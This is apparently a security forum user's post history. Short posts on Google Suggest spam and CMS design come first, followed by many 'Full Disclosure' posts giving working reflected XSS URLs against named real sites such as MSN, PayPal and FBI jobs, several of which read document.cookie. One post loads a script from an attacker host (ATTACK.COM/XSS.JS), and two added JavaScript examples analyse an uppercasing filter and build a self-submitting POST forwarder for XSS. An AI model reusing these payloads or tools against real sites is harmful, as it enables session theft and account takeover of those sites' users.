Sla.ckers.org
sla.ckers.org is ha.ckers sla.cking
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 

Results 1 - 24 of 24
7 years ago
thomaspollet
I ran wget for a couple of hours; I don't know if it has anything to do with that. I only used rsnake, not the rest.
Forum: Search Engine Hacking and SEO
7 years ago
thomaspollet
Welcome to Google Suggest :) Takes a while to update their lists ... There's: rsnake, rsnake xss, rsnake xss cheat sheet ... Regards, Thomas
Forum: Search Engine Hacking and SEO
7 years ago
thomaspollet
That's when they use the indices. If Google uses the search queries to suggest something and lots of people turn out to be looking for rsnake, it may come up. Like: MySpace worm + Google query for rsnake on every page... Regards, T
Forum: Search Engine Hacking and SEO
7 years ago
thomaspollet
Hi, does somebody know if it is possible to spam Google suggestions? Regards, Thomas
Forum: Search Engine Hacking and SEO
7 years ago
thomaspollet
neuroo, if the input validation was always done like that, the number of SQL inj/XSS/file inc bugs wouldn't be as high as it is now... Then there's the use of XSL stylesheets, which is a powerful way to add structure and eye candy to basic (XML) data, whereas now these things are commonly implemented in the same code as the fetching of the data. I don't know about every OS CMS but I've seen a lot which 'ju
Forum: Projects
7 years ago
thomaspollet
jungsonn, do you have some code open sourced somewhere? I wasn't especially talking about security but more about general software development: IMO good software design mitigates the security risks. In a layered approach, input validation can be performed at the different levels and in an organised way; that's true for all software. Whenever I see something like $result=mysql_query($query); print '&l
Forum: Projects
7 years ago
thomaspollet
Drupal is pretty nice but, as all other CMSs, it's developed around a need for features and user functionality. From a software engineering point of view all CMSs are just webpages on steroids. The idea I had when I was thinking about CMSs was based on strict separation of different layers; there's:
- data
- application logic
- page structure
- style
Now these parts can be implemented using:
- db
Forum: Projects
7 years ago
thomaspollet
Thread: cms
Hello, what content management systems do you like? Some time ago I started coding a pet CMS but as the CMS-o-sphere is crowded enough I quit it. Yet I'm still frustrated with the design and coding of most CMSs. Is there a CMS out there which does not suck? Is it worth the time coding yet another CMS? Greets, Thomas
Forum: Projects
7 years ago
thomaspollet
http://www.restorationhardware.com/rh/search/search_results.jsp?refineByValue=%3C/script%3E%3Cscript%3Ealert('b00')%3C/script%3EBath%3ABath+Hardware%3ATowel+Bars+%26+Tissue+Holders&link=refineby
Forum: Full Disclosure
7 years ago
thomaspollet
https://www.adorama.com/catalog.tpl?op=process&func=Login&xemail=%3Cscript%3Ealert('hack3r%20safe!')%3C/script%3E
Forum: Full Disclosure
7 years ago
thomaspollet
From the FD thread:
http://www.tritonhealth.com/cgi-bin/category.cgi?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.usenext.com/UseNextDE/ShopInt/misc/miscShowNewsgroups.cfm?SNUUID=CC8A8130-E00E-2063-874892F19C7A185D&1163072824024%22%3E%3Cscript%3Ealert(1)%3C/script%3E&
Forum: Full Disclosure
7 years ago
thomaspollet
http://www.usenext.com/UseNextDE/ShopInt/misc/miscShowNewsgroups.cfm?SNUUID=CC8A8130-E00E-2063-874892F19C7A185D&1163072824024%22%3E%3Cscript%3Ealert(1)%3C/script%3E&
This one converts to uppercase. Is there an XSS.JS up somewhere? <SCRIPT SRC=HTTP://ATTACK.COM/XSS.JS> should work...
Forum: Full Disclosure
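Added example, not code from the thread: a model of the reflection sink the post describes (user input uppercased before being written unescaped into an attribute) together with a check of which script payloads still run after that transformation. The sink, the attribute context and the host attack.com are assumptions for illustration. It shows why an inline alert(1) dies (JavaScript identifiers are case-sensitive, so ALERT is undefined) while an external SCRIPT SRC survives in the scheme and host (which the URL parser folds to lowercase) but keeps the uppercased path, so the file really has to be served as /XSS.JS.

```javascript
// Added example: which XSS payloads survive a sink that uppercases input?
// Assumed sink: the application uppercases the parameter and reflects it
// unescaped inside a double-quoted attribute value.
function uppercasingSink(userInput) {
  return '<input type="text" name="q" value="' + userInput.toUpperCase() + '">';
}

// Pull every <script ...>...</script> (or an unterminated <script ...>) out
// of the rendered page. Tag and attribute names are matched case-insensitively,
// exactly as an HTML parser treats them, which is why <SCRIPT> still counts.
function extractScripts(html) {
  const re = /<script\b([^>]*)>([\s\S]*?)(?:<\/script\s*>|$)/gi;
  const srcRe = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    const attrs = m[1];
    const body = m[2];
    const s = srcRe.exec(attrs);
    out.push({ src: s ? (s[1] ?? s[2] ?? s[3]) : null, body });
  }
  return out;
}

// Inline script bodies run as JavaScript, where identifiers are
// case-sensitive: ALERT(1) throws a ReferenceError even though alert exists.
// A stand-in alert records whether the body managed to call it.
function inlineExecutes(body) {
  let fired = false;
  const fakeAlert = () => { fired = true; };
  try {
    new Function('alert', body)(fakeAlert);
  } catch (e) {
    return false;
  }
  return fired;
}

// External scripts survive case folding in the scheme and host (the URL
// parser lowercases both) but not in the path, which the web server compares
// as given: the attacker must host the file under the exact name /XSS.JS.
function classifyPayload(payload) {
  const html = uppercasingSink(payload);
  return extractScripts(html).map(({ src, body }) => {
    if (src !== null) {
      const u = new URL(src);
      return { kind: 'external', scheme: u.protocol, host: u.hostname, path: u.pathname };
    }
    return { kind: 'inline', body, executes: inlineExecutes(body) };
  });
}

// Usage: compare the inline payload from the thread with the SCRIPT SRC one.
console.log(classifyPayload('"><script>alert(1)</script>'));
console.log(classifyPayload('"><SCRIPT SRC=HTTP://ATTACK.COM/XSS.JS>'));
```

The external variant reports scheme http: and host attack.com regardless of input case, but path /XSS.JS; on a case-sensitive web server the payload file has to be stored under that uppercase name, which is the practical reason the post asks whether an XSS.JS is already hosted somewhere.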
7 years ago
thomaspollet
That hackersafe is just the next lie in infosec, providing that nice fuzzy false sense of security feeling. Makes good .biz I suppose.
http://www.tritonhealth.com/cgi-bin/category.cgi?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
google intext:"hacker safe" ;)
Forum: Full Disclosure
8 years ago
thomaspollet
http://www.prodigy.msn.com/Salud/Tusalud/SaludMedicinas/default.asp?id_articulo=%22%3E%3C/iframe%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Forum: Full Disclosure
8 years ago
thomaspollet
http://astrocenter.astrology.msn.com/msn/DeptChinWeek.aspx?When=1);alert(document.cookie&Af=-1000
Forum: Full Disclosure
8 years ago
thomaspollet
lol "TEST and Demonstration site for Acunetix Web Vulnerability Scanner" tja :s
Forum: Full Disclosure
8 years ago
thomaspollet
Acunetix :p
POST http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://testphp.acunetix.com/search.php?test=query&searchFor=%3Cscript%3Ealert(1)%3C/script%3E
Forum: Full Disclosure
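Added example, not the code of the whiteacid.org forwarder the post links to: one way such a "POST forwarder" can work. A reflected XSS sink that only reads the parameter from a POST body cannot be hit with a plain link, so the forwarder serves a page holding a hidden, self-submitting form aimed at the target. The query-string layout (xss_target plus the remaining parameters as form fields) is taken from the URL in the post; the page markup and the way the payload is escaped so it survives the forwarder's own HTML are assumptions.

```javascript
// Added example: generate a self-submitting POST form for a payload that the
// target only reads from the request body.

// Escape a value for placement inside a double-quoted HTML attribute, so the
// browser submits the payload unchanged instead of parsing it as markup in
// the forwarder page itself (otherwise <script> would fire here, not there).
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Render a page holding one hidden form that submits itself on load.
// Without JavaScript the visible button still lets the user send it.
function buildPostForwarder(target, fields) {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      '    <input type="hidden" name="' + escapeAttr(name) + '" value="' + escapeAttr(value) + '">')
    .join('\n');
  return [
    '<!DOCTYPE html>',
    '<html><body onload="document.forms[0].submit()">',
    '  <form method="POST" action="' + escapeAttr(target) + '">',
    inputs,
    '    <noscript><input type="submit" value="Continue"></noscript>',
    '  </form>',
    '</body></html>',
  ].join('\n');
}

// Parse the forwarder's own query string (xss_target=...&field=value&...)
// into the target URL and the fields to POST. Everything after the first
// '&' following xss_target is treated as a form field, which is how the
// URL in the post separates the target's own ?test=query from searchFor.
function parseForwarderQuery(queryString) {
  const params = new URLSearchParams(queryString);
  const target = params.get('xss_target');
  const fields = {};
  for (const [k, v] of params) {
    if (k !== 'xss_target') fields[k] = v;
  }
  return { target, fields };
}

// Usage with the (constructed) query string from the post's URL.
const req = parseForwarderQuery(
  'xss_target=http://testphp.acunetix.com/search.php?test=query&searchFor=%3Cscript%3Ealert(1)%3C/script%3E'
);
console.log(buildPostForwarder(req.target, req.fields));
```

The attribute escaping is the part worth getting right: if the forwarder wrote the raw payload into value="...", the script would execute in the forwarder's origin, and a browser would never send the intended POST.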
8 years ago
thomaspollet
http://lifestyle.msn.com/HomeandGarden/BeJane/Article.aspx?cp-documentid=';alert(1);s='nn
Forum: Full Disclosure
8 years ago
thomaspollet
I have an XSS question: consider the following HTML injection: http://moneycentral.msn.com/loan/mortcalc.aspx?Price=%22%20style="background-image:url(javascript:alert(2))"> This results in <input type="text" value="" style="background-image:url(javascript:alert(2))"> Why don't I get a pop-up on the msn site while the same tag does execute JS in a clean ht
Forum: Full Disclosure
8 years ago
thomaspollet
https://adcenter.microsoft.com/signup.aspx?adv_market=en-us%22;alert(1);s_account=%22&s_int=118
Forum: Full Disclosure
8 years ago
thomaspollet
> btw, how long do companies like TRUSTe, PayPal need to fix their holes?
PayPal takes too long; the last hole I reported took more than a week and several mails to get fixed. They don't have a 'standard' security@ mail address, they don't monitor public mailing lists. In short, they suck at securing their customers. http://www.paypal.com/cgi-bin/webscr?cmd=_security-center-outside <-- full
Forum: Full Disclosure
8 years ago
thomaspollet
http://www.fbijobs.gov/searchresult.asp?SearchString=%3Cscript%3Ealert(1)%3C/script%3E
Forum: Full Disclosure
8 years ago
thomaspollet
I reported XSS in the MyHeadlines PHP-Nuke module, yet it's still live in some places: http://cccure.org/modules.php?op=modload&name=MyHeadlines&file=index&myh=user&myh_op=show_all%22%3E%3Cscript%3Ealert(2)%3C/script%3E&eid=2474
Forum: Full Disclosure
8 years ago
thomaspollet
I reported the phpnuke.org XSS to them a while ago. Sad they haven't fixed it since then. + I love the stock market XSS: go figure, someone spamming about stock XYZ skyrocketing, putting XSS'ed links to NASDAQ etc. on it... profit! Is someone coding an XSS scanner/fuzzer? I have some ideas on this subject.
Forum: Full Disclosure